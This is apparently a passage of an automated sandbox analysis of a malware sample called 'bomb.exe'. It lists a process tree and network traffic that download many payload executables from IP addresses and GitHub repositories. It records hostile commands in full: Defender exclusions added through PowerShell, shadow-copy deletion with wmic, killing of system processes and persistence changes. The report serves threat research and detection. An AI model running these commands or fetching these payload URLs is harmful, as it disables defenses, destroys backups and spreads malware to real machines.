    - System Location Discovery: System Language Discovery
    PID:1432
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5296
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1560
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5532
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del3.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66del3.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:3392
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" ""
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4824
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "winsrvcs" & exit
      4⤵
      PID:812
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /delete /f /tn "winsrvcs"
        5⤵
        
        PID:5456
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainBootxr.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  PID:3080
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2200
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR"
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:5048
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainDpose.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops autorun.inf file
  - System Location Discovery: System Language Discovery
  PID:752
- - \??\c:\Windows\system32\wbem\wmic.exe
    c:\iFVdXT\iFVd\..\..\Windows\iFVd\iFVd\..\..\system32\iFVd\iFVd\..\..\wbem\iFVd\iFVdX\..\..\wmic.exe shadowcopy delete
    3⤵
    PID:3744
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainmimikatz.exe.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5836
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3304
- C:\Users\Admin\AppData\Local\Temp\http185.215.113.66klmnr.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http185.215.113.66klmnr.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4252
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /Delete /TN "Microsoft Windows Security" /F
    3⤵
    - Indicator Removal: Clear Persistence
    - System Location Discovery: System Language Discovery
    PID:5472
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /TN "Microsoft Windows Security" /F
      4⤵
      PID:1284
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM dwm.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5484
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM dwm.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5724
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5596
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:1304
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5736
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:1112
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:5852
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      Kills process with taskkill
      PID:2228
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c taskkill /F /IM conhost.exe
    3⤵
    - System Location Discovery: System Language Discovery
    PID:6024
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /F /IM conhost.exe
      4⤵
      System Location Discovery: System Language Discovery
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:5620
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmaintoyour.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:4936
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainMizedo.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1528
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshClient.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshClient.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5744
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshbuild.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshbuild.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:6052
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshDevil2.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64reshDevil2.exe.exe"
  2⤵
  - Executes dropped EXE
  - Accesses Microsoft Outlook profiles
  - System Location Discovery: System Language Discovery
  - outlook_office_path
  - outlook_win_path
  PID:5608
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsA.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsA.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:1760
- C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptBREMCOS.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http196.251.92.64cryptBREMCOS.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  PID:2036
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsDL.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsDL.exe.exe"
  2⤵
  - Downloads MZ/PE file
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:5148
- C:\Users\Admin\AppData\Local\Temp\http77.105.161.58files1.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http77.105.161.58files1.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:6100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:6524
- C:\Users\Admin\AppData\Local\Temp\http85.209.128.206DownloadsVirtualPR.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http85.209.128.206DownloadsVirtualPR.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6060
- C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\httpsgithub.comLean789ruehtrawrefsheadsmainxmrig.exe.exe"
  2⤵
  - Executes dropped EXE
  PID:1276
- C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsB.exe.exe
  "C:\Users\Admin\AppData\Local\Temp\http162.230.48.189uploadsB.exe.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:6352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3744 -ip 3744
1⤵
PID:3624

C:\ProgramData\WinUpdt\wincsupdt.exe
C:\ProgramData\WinUpdt\wincsupdt.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:2984
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3144
- - C:\ProgramData\WinUpdt\wincsupdt.exe
    "C:\ProgramData\WinUpdt\wincsupdt.exe"
    3⤵
    - Executes dropped EXE
    PID:5400

C:\ProgramData\WinUpla\winuspdt.exe
C:\ProgramData\WinUpla\winuspdt.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3152
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:5140
- C:\Windows\system32\dwm.exe
  dwm.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:5196

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5980

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4364

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4984

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3060

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2416

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4252

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4752

C:\Windows\system32\dwm.exe
"dwm.exe"
1⤵
- Modifies data under HKEY_USERS
PID:5588

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D0 0x00000000000004C0
1⤵
PID:6672

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0 /state0:0xa3980055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:5344

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000f8 0000008c
1⤵
PID:4444

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000011c 0000008c
1⤵
PID:4188

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000108 0000008c
1⤵
PID:5048

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000010c 0000008c
1⤵
PID:4480

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
PID:2532

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000011c 0000008c
1⤵
PID:2200

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000010c 0000008c
1⤵
PID:5608

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000124 0000008c
1⤵
PID:5140

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000124 0000008c
1⤵
PID:6024

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000120 0000008c
1⤵
PID:5296

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000c0 0000008c
1⤵
PID:1432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4004 -ip 4004
1⤵
PID:5252

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000011c 0000008c
1⤵
PID:5364

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000ec 0000008c
1⤵
PID:5744

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000124 0000008c
1⤵
PID:6052

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000e0 0000008c
1⤵
PID:6352

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 0000010c 0000008c
1⤵
PID:6100

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000110 0000008c
1⤵
PID:5408

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000e0 0000008c
1⤵
PID:5724

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000120 0000008c
1⤵
PID:5456

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000114 0000008c
1⤵
PID:5484

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000118 0000008c
1⤵
PID:6524

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000110 0000008c
1⤵
PID:1276

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000114 0000008c
1⤵
PID:1304

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000e0 0000008c
1⤵
PID:5596

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000114 0000008c
1⤵
PID:1284

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000114 0000008c
1⤵
PID:1112

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000118 0000008c
1⤵
PID:5736

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000d8 0000008c
1⤵
PID:5148

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000120 0000008c
1⤵
PID:2036

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000ec 0000008c
1⤵
PID:1760

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000114 0000008c
1⤵
PID:6060

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 000000f8 0000008c
1⤵
PID:2228

C:\Windows\System32\smss.exe
\SystemRoot\System32\smss.exe 00000108 0000008c
1⤵
PID:3304

C:\Windows\system32\wbem\WMIADAP.EXE
wmiadap.exe /R /T
1⤵
- Drops file in System32 directory
PID:3692

Network

DNS

urlhaus.abuse.ch

bomb.exe

Remote address:

8.8.8.8:53

Request

urlhaus.abuse.ch

IN A

Response

urlhaus.abuse.ch

IN CNAME

p2.shared.global.fastly.net

p2.shared.global.fastly.net

IN A

151.101.66.49

p2.shared.global.fastly.net

IN A

151.101.130.49

p2.shared.global.fastly.net

IN A

151.101.194.49

p2.shared.global.fastly.net

IN A

151.101.2.49
DNS

49.66.101.151.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

49.66.101.151.in-addr.arpa

IN PTR

Response
DNS

raw.githubusercontent.com

bomb.exe

Remote address:

8.8.8.8:53

Request

raw.githubusercontent.com

IN A

Response

raw.githubusercontent.com

IN A

185.199.111.133

raw.githubusercontent.com

IN A

185.199.108.133

raw.githubusercontent.com

IN A

185.199.110.133

raw.githubusercontent.com

IN A

185.199.109.133
DNS

66.113.215.185.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

66.113.215.185.in-addr.arpa

IN PTR

Response
DNS

97.113.215.185.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

97.113.215.185.in-addr.arpa

IN PTR

Response
DNS

189.48.230.162.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

189.48.230.162.in-addr.arpa

IN PTR

Response

189.48.230.162.in-addr.arpa

IN PTR

162-230-48-189 lightspeedjcvlfl sbcglobalnet
DNS

book.rollingvideogames.com

bomb.exe

Remote address:

8.8.8.8:53

Request

book.rollingvideogames.com

IN A

Response

book.rollingvideogames.com

IN A

23.235.202.121
DNS

58.161.105.77.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

58.161.105.77.in-addr.arpa

IN PTR

Response
DNS

sebel.sbs

bomb.exe

Remote address:

8.8.8.8:53

Request

sebel.sbs

IN A

Response

sebel.sbs

IN A

172.67.186.47

sebel.sbs

IN A

104.21.19.129
DNS

50.33.237.178.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

50.33.237.178.in-addr.arpa

IN PTR

Response

50.33.237.178.in-addr.arpa

IN CNAME

50.32/27.178.237.178.in-addr.arpa
DNS

self.events.data.microsoft.com

bomb.exe

Remote address:

8.8.8.8:53

Request

self.events.data.microsoft.com

IN A

Response

self.events.data.microsoft.com

IN CNAME

self-events-data.trafficmanager.net

self-events-data.trafficmanager.net

IN CNAME

onedscolprdcus10.centralus.cloudapp.azure.com

onedscolprdcus10.centralus.cloudapp.azure.com

IN A

52.182.143.210
GET

https://urlhaus.abuse.ch/downloads/text/

bomb.exe

Remote address:

151.101.66.49:443

Request

GET /downloads/text/ HTTP/1.1
Host: urlhaus.abuse.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 5946398
Server: Apache
Strict-Transport-Security: max-age=15768000 ; includeSubDomains
Expect-CT: enforce, max-age=86400
Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), camera=(), encrypted-media=(), fullscreen=(), geolocation=(), gyroscope=(), magnetometer=(), microphone=(), midi=(), payment=(), picture-in-picture=(), speaker=(), usb=(), vr=()
Referrer-Policy: strict-origin-when-cross-origin
Content-Security-Policy: default-src 'self' https://fonts.gstatic.com:443 https://region1.google-analytics.com:443 data:; style-src 'self' 'unsafe-inline' https://www.gstatic.com:443 https://fonts.googleapis.com:443 https://hcaptcha.com https://*.hcaptcha.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.gstatic.com:443 https://www.google.com/recaptcha/ https://www.googletagmanager.com:443 https://hcaptcha.com https://*.hcaptcha.com; frame-src https://www.google.com/recaptcha/ https://hcaptcha.com https://*.hcaptcha.com; img-src 'self' data: https://syndication.twitter.com:443; object-src 'none';
Cross-Origin-Opener-Policy: same-origin; report-to="default"
Cross-Origin-Resource-Policy: same-site
Last-Modified: Sat, 22 Feb 2025 16:30:13 GMT
ETag: "5abc1e-62ebd9f1b78bc"
Cache-Control: max-age=300
Expires: Sat, 22 Feb 2025 16:40:01 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Content-Type: text/plain
Via: 1.1 varnish, 1.1 varnish
Accept-Ranges: bytes
Date: Sat, 22 Feb 2025 16:35:06 GMT
Age: 5
X-Served-By: cache-fra-eddf8230074-FRA, cache-lcy-eglc8600055-LCY
X-Cache: MISS, HIT
X-Cache-Hits: 0, 1
X-Timer: S1740242107.931372,VS0,VE2
Vary: Accept-Encoding
DNS

github.com

bomb.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

75.113.215.185.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

75.113.215.185.in-addr.arpa

IN PTR

Response
DNS

12.84.154.217.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

12.84.154.217.in-addr.arpa

IN PTR

Response

12.84.154.217.in-addr.arpa

IN PTR

ip217-154-84-12pbiaascom
DNS

moneroman.ddns.net

bomb.exe

Remote address:

8.8.8.8:53

Request

moneroman.ddns.net

IN A

Response
DNS

121.202.235.23.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

121.202.235.23.in-addr.arpa

IN PTR

Response
DNS

21.142.166.185.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

21.142.166.185.in-addr.arpa

IN PTR

Response
DNS

geoplugin.net

bomb.exe

Remote address:

8.8.8.8:53

Request

geoplugin.net

IN A

Response

geoplugin.net

IN A

178.237.33.50
DNS

169.168.48.74.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

169.168.48.74.in-addr.arpa

IN PTR

Response

169.168.48.74.in-addr.arpa

IN PTR

41-15-211-198-dedicatedmultacomcom
DNS

210.143.182.52.in-addr.arpa

bomb.exe

Remote address:

8.8.8.8:53

Request

210.143.182.52.in-addr.arpa

IN PTR

Response
GET

http://185.215.113.66/pei.exe

bomb.exe

Remote address:

185.215.113.66:80

Request

GET /pei.exe HTTP/1.1
Host: 185.215.113.66
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: application/octet-stream
Content-Length: 10240
Last-Modified: Sun, 24 Nov 2024 16:23:03 GMT
Connection: keep-alive
ETag: "674352e7-2800"
Accept-Ranges: bytes
GET

http://185.215.113.66/xmin.exe

bomb.exe

Remote address:

185.215.113.66:80

Request

GET /xmin.exe HTTP/1.1
Host: 185.215.113.66

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: application/octet-stream
Content-Length: 2620416
Last-Modified: Fri, 21 Feb 2025 08:21:48 GMT
Connection: keep-alive
ETag: "67b8379c-27fc00"
Accept-Ranges: bytes
GET

http://185.215.113.66/mindelnew.exe

bomb.exe

Remote address:

185.215.113.66:80

Request

GET /mindelnew.exe HTTP/1.1
Host: 185.215.113.66
GET

http://twizt.net/newtpp.exe

bomb.exe

Remote address:

185.215.113.66:80

Request

GET /newtpp.exe HTTP/1.1
Host: twizt.net
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 22 Feb 2025 16:35:08 GMT
Content-Type: application/octet-stream
Content-Length: 80896
Last-Modified: Tue, 12 Nov 2024 22:30:51 GMT
Connection: keep-alive
ETag: "6733d71b-13c00"
Accept-Ranges: bytes
GET

https://raw.githubusercontent.com/gamingdued123/UeukFI/main/clientside.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /gamingdued123/UeukFI/main/clientside.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 37888
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "463a425473d72b25d0ee70108310ee83ea78d50a16ccd605108e0b421ee8cd03"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: F2B0:121B05:100E35:293099:67B9F93D
Accept-Ranges: bytes
Date: Sat, 22 Feb 2025 16:35:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600030-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1740242108.119949,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: aaa65771dd3ccb028e76352be4a73b58946dca5e
Expires: Sat, 22 Feb 2025 16:40:08 GMT
Source-Age: 5
GET

https://raw.githubusercontent.com/ff245185/payload/refs/heads/main/FastDownload.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /ff245185/payload/refs/heads/main/FastDownload.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 404 Not Found

Connection: keep-alive
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: D277:39D93E:10DBEB:2A5242:67B9FCB7
Accept-Ranges: bytes
Date: Sat, 22 Feb 2025 16:35:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600030-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1740242108.180215,VS0,VE1
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: c5224dc65ab08f9977882fbf15d052e89b6a8f78
Expires: Sat, 22 Feb 2025 16:40:08 GMT
Source-Age: 5
GET

https://raw.githubusercontent.com/BARHOM1/brobr/main/WindowsServices.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /BARHOM1/brobr/main/WindowsServices.exe HTTP/1.1
Host: raw.githubusercontent.com

Response

HTTP/1.1 200 OK

Connection: keep-alive
Content-Length: 49152
Cache-Control: max-age=300
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Content-Type: application/octet-stream
ETag: "f05ab632c0bc8789b2ad8c21524afef0f3e3ae5744ad052142ade9316ea0500b"
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
X-GitHub-Request-Id: 8115:3BB6DE:703FB:108144:67B9F93E
Accept-Ranges: bytes
Date: Sat, 22 Feb 2025 16:35:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lcy-eglc8600030-LCY
X-Cache: HIT
X-Cache-Hits: 1
X-Timer: S1740242108.222729,VS0,VE3
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 6aa43be6940a14190a41bbc5fbbcdc39d4365491
Expires: Sat, 22 Feb 2025 16:40:08 GMT
Source-Age: 4
GET

https://raw.githubusercontent.com/sohpierainxz/Fnaf-1/refs/heads/main/fuscagame.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /sohpierainxz/Fnaf-1/refs/heads/main/fuscagame.exe HTTP/1.1
Host: raw.githubusercontent.com
GET

https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/Bootxr.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /Lean789/rueht/refs/heads/main/Bootxr.exe HTTP/1.1
Host: raw.githubusercontent.com
GET

https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/Mizedo.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /Lean789/rueht/refs/heads/main/Mizedo.exe HTTP/1.1
Host: raw.githubusercontent.com
GET

https://raw.githubusercontent.com/Lean789/rueht/refs/heads/main/xmrig.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /Lean789/rueht/refs/heads/main/xmrig.exe HTTP/1.1
Host: raw.githubusercontent.com
GET

https://raw.githubusercontent.com/Toxicxz/Fnaf-1/refs/heads/main/fuscagame.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

GET /Toxicxz/Fnaf-1/refs/heads/main/fuscagame.exe HTTP/1.1
Host: raw.githubusercontent.com
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Connection: keep-alive
Content-Length: 14
Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-XSS-Protection: 1; mode=block
Content-Type: text/plain; charset=utf-8
X-GitHub-Request-Id: 24DB:11AF14:109410:2A0A9F:67B9FCBB
Accept-Ranges: bytes
Date: Sat, 22 Feb 2025 16:35:08 GMT
Via: 1.1 varnish
X-Served-By: cache-lon4261-LON
X-Cache: MISS
X-Cache-Hits: 0
X-Timer: S1740242108.119702,VS0,VE79
Vary: Authorization,Accept-Encoding,Origin
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
X-Fastly-Request-ID: 49690ccd5279e271c74e242c17ed5bb0710625d0
Expires: Sat, 22 Feb 2025 16:40:08 GMT
Source-Age: 0
GET

https://raw.githubusercontent.com/KREveDko3221/porno/main/mosssssttttt.exe

bomb.exe

Remote address:

185.199.111.133:443

Request

